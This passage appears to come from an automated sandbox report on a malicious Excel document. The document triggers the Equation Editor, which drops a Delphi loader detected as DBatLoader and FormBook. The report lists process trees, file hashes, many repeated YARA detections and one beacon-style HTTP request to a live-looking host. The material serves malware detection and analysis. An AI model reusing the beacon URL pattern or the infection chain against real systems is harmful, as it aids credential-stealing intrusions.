00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 20 06 00 00 02 00 00 00 da 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 65 6c 6f 63 00 00 6c 63 00 00 00 30 06 00 00 64 00 00 00 dc 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 66 04 00 00 a0 06 00 00 66 04 00 00 40 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 10 0b 00 00 00 00 00 00 a6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                            Data Ascii: MZP@!L!This program must be run under Win32$7PEL^B*@@!f0lc CODE\ `DATA@BSS.idata!"@.tls.rdata @P.reloclc0d@P.rsrcff@@P@P


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            1192.168.2.224918187.98.234.16480C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Dec 2, 2021 19:35:29.554336071 CET1716OUTGET /hno0/?mhcd=MR-LdRqXxT7p86&g6A06=gtNg4Bp0cFA4pVLeRD7vodntk6HewgsZ+AnpdRhteKnDm7bsVUj6fD8/RHuCSiZlcACYig== HTTP/1.1
                                                            Host: www.urzeczenie.com
                                                            Connection: close
                                                            Data Raw: 00 00 00 00 00 00 00
                                                            Data Ascii:
                                                            Dec 2, 2021 19:35:29.582178116 CET1717INHTTP/1.1 404 Not Found
                                                            Date: Thu, 02 Dec 2021 18:35:28 GMT
                                                            Server: Apache/2
                                                            Content-Length: 392
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 68 6e 6f 30 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 75 72 7a 65 63 7a 65 6e 69 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /hno0/ was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2 Server at www.urzeczenie.com Port 80</address></body></html>


                                                            Code Manipulations

                                                            Statistics

                                                            Behavior

                                                            Click to jump to process

                                                            System Behavior

                                                            Analysis Process: EXCEL.EXE PID: 1124 Parent PID: 596

                                                            General

                                                            Start time:19:33:19
                                                            Start date:02/12/2021
                                                            Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                            Imagebase:0x13fe20000
                                                            File size:28253536 bytes
                                                            MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            Analysis Process: EQNEDT32.EXE PID: 2676 Parent PID: 596

                                                            General

                                                            Start time:19:33:44
                                                            Start date:02/12/2021
                                                            Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                            Imagebase:0x400000
                                                            File size:543304 bytes
                                                            MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            Analysis Process: vbc.exe PID: 488 Parent PID: 2676

                                                            General

                                                            Start time:19:33:48
                                                            Start date:02/12/2021
                                                            Path:C:\Users\Public\vbc.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\Public\vbc.exe"
                                                            Imagebase:0x400000
                                                            File size:697856 bytes
                                                            MD5 hash:3A9AE96D1F6404FCCF5BD99B7C5C0383
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:Borland Delphi
                                                            Yara matches:
                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000004.00000003.480010544.0000000000320000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000004.00000003.497269548.00000000045D4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000004.00000003.497233291.00000000045D4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000004.00000003.479622331.000000000031C000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000004.00000003.479715174.000000000030C000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000004.00000003.497427116.0000000003A2C000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.563280324.0000000003A70000.00000040.00020000.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.563280324.0000000003A70000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.563280324.0000000003A70000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000004.00000003.497196939.00000000045D4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000004.00000003.497027305.00000000045D4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000004.00000003.478861422.000000000030C000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000004.00000003.496929665.0000000003A2C000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.566151978.00000000047EC000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.566151978.00000000047EC000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.566151978.00000000047EC000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000004.00000003.497250611.0000000003A2C000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000004.00000003.497289431.0000000003A2C000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000004.00000003.497089082.0000000003A2C000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000004.00000003.497109502.00000000045D4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000004.00000003.478734155.0000000000334000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000004.00000003.478780322.000000000030C000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000004.00000003.478805681.000000000031C000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000004.00000003.479654433.0000000000334000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000004.00000003.497453789.00000000045D4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000004.00000003.480122394.000000000030C000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.561814301.0000000002111000.00000020.00000001.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.561814301.0000000002111000.00000020.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.561814301.0000000002111000.00000020.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000004.00000003.497486545.0000000003A2C000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.563603839.0000000003CC0000.00000040.00020000.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.563603839.0000000003CC0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.563603839.0000000003CC0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000004.00000003.497066247.00000000045D4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000004.00000003.497151468.00000000045D4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000004.00000003.497352648.00000000045D4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000004.00000003.497402362.00000000045D4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000004.00000003.497007493.0000000003A2C000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000004.00000003.497047805.0000000003A2C000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.566701334.00000000049C0000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.566701334.00000000049C0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.566701334.00000000049C0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000004.00000003.497310666.00000000045D4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000004.00000003.497216692.0000000003A2C000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000004.00000003.496970511.0000000003A2C000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000004.00000003.497375359.0000000003A2C000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000004.00000003.478831765.0000000000330000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000004.00000003.497129768.0000000003A2C000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000004.00000003.497173543.0000000003A2C000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000004.00000003.496988721.00000000045D4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000004.00000002.559751606.000000000031C000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000004.00000003.496950369.00000000045D4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000004.00000003.497333632.0000000003A2C000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000004.00000003.480088573.0000000000330000.00000004.00000001.sdmp, Author: Joe Security
                                                            Antivirus matches:
                                                            • Detection: 100%, Joe Sandbox ML
                                                            • Detection: 36%, ReversingLabs
                                                            Reputation:low

                                                            Analysis Process: explorer.exe PID: 1764 Parent PID: 488

                                                            General

                                                            Start time:19:34:11
                                                            Start date:02/12/2021
                                                            Path:C:\Windows\explorer.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\Explorer.EXE
                                                            Imagebase:0xffa10000
                                                            File size:3229696 bytes
                                                            MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.535838106.0000000009304000.00000040.00020000.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.535838106.0000000009304000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.535838106.0000000009304000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.548231693.0000000009304000.00000040.00020000.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.548231693.0000000009304000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.548231693.0000000009304000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                            Reputation:high

                                                            Analysis Process: Odhbljup.exe PID: 1320 Parent PID: 1764

                                                            General

                                                            Start time:19:34:16
                                                            Start date:02/12/2021
                                                            Path:C:\Users\user\Odhbljup.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Odhbljup.exe"
                                                            Imagebase:0x400000
                                                            File size:697856 bytes
                                                            MD5 hash:3A9AE96D1F6404FCCF5BD99B7C5C0383
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:Borland Delphi
                                                            Yara matches:
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000007.00000003.560841692.00000000046D4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000007.00000003.562335520.00000000046D4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000007.00000003.561342324.00000000039EC000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000007.00000003.560628845.00000000039EC000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000007.00000003.541642413.0000000001D5C000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000007.00000003.560576590.00000000046D4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000007.00000003.560966486.00000000039EC000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000007.00000003.561221425.00000000046D4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000007.00000003.540973597.0000000001D5C000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000007.00000003.562432544.00000000039EC000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000007.00000003.541230145.0000000001D6C000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000007.00000003.561955738.00000000039EC000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000007.00000003.541187560.0000000001D5C000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000007.00000003.541036876.0000000001D6C000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000007.00000003.560450286.00000000039EC000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000007.00000003.541516401.0000000001D80000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000007.00000003.560538390.00000000039EC000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000007.00000003.562142811.00000000046D4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000007.00000003.562245816.00000000039EC000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000007.00000003.541395274.0000000001D70000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000007.00000003.560383083.00000000046D4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000007.00000003.561149693.00000000039EC000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000007.00000003.561547476.00000000039EC000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000007.00000003.560320590.00000000039EC000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000007.00000003.541266508.0000000001D84000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000007.00000003.561741705.00000000039EC000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000007.00000003.561654798.00000000046D4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000007.00000003.560760985.00000000039EC000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000007.00000003.541317929.0000000001D5C000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000007.00000003.560713668.00000000046D4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000007.00000003.560263078.00000000046D4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000007.00000003.540909993.0000000001D84000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000007.00000003.560188388.00000000039EC000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000007.00000003.561086888.00000000046D4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000007.00000003.561847558.00000000046D4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000007.00000003.561433212.00000000046D4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000007.00000003.541124265.0000000001D80000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000007.00000003.560491541.00000000046D4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            Antivirus matches:
                                                            • Detection: 100%, Joe Sandbox ML
                                                            • Detection: 36%, ReversingLabs
                                                            Reputation:low

                                                            Analysis Process: Odhbljup.exe PID: 2192 Parent PID: 1764

                                                            General

                                                            Start time:19:34:23
                                                            Start date:02/12/2021
                                                            Path:C:\Users\user\Odhbljup.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Odhbljup.exe"
                                                            Imagebase:0x400000
                                                            File size:697856 bytes
                                                            MD5 hash:3A9AE96D1F6404FCCF5BD99B7C5C0383
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:Borland Delphi
                                                            Yara matches:
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 0000000A.00000003.583392738.00000000038CC000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 0000000A.00000003.584292302.00000000045A4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 0000000A.00000003.583748218.00000000045A4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 0000000A.00000003.584057831.00000000038CC000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 0000000A.00000003.584430165.00000000045A4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000A.00000003.566824102.0000000001CF0000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 0000000A.00000003.583809882.00000000038CC000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                                            • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000A.00000003.566299990.0000000001D00000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 0000000A.00000003.583259344.00000000045A4000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
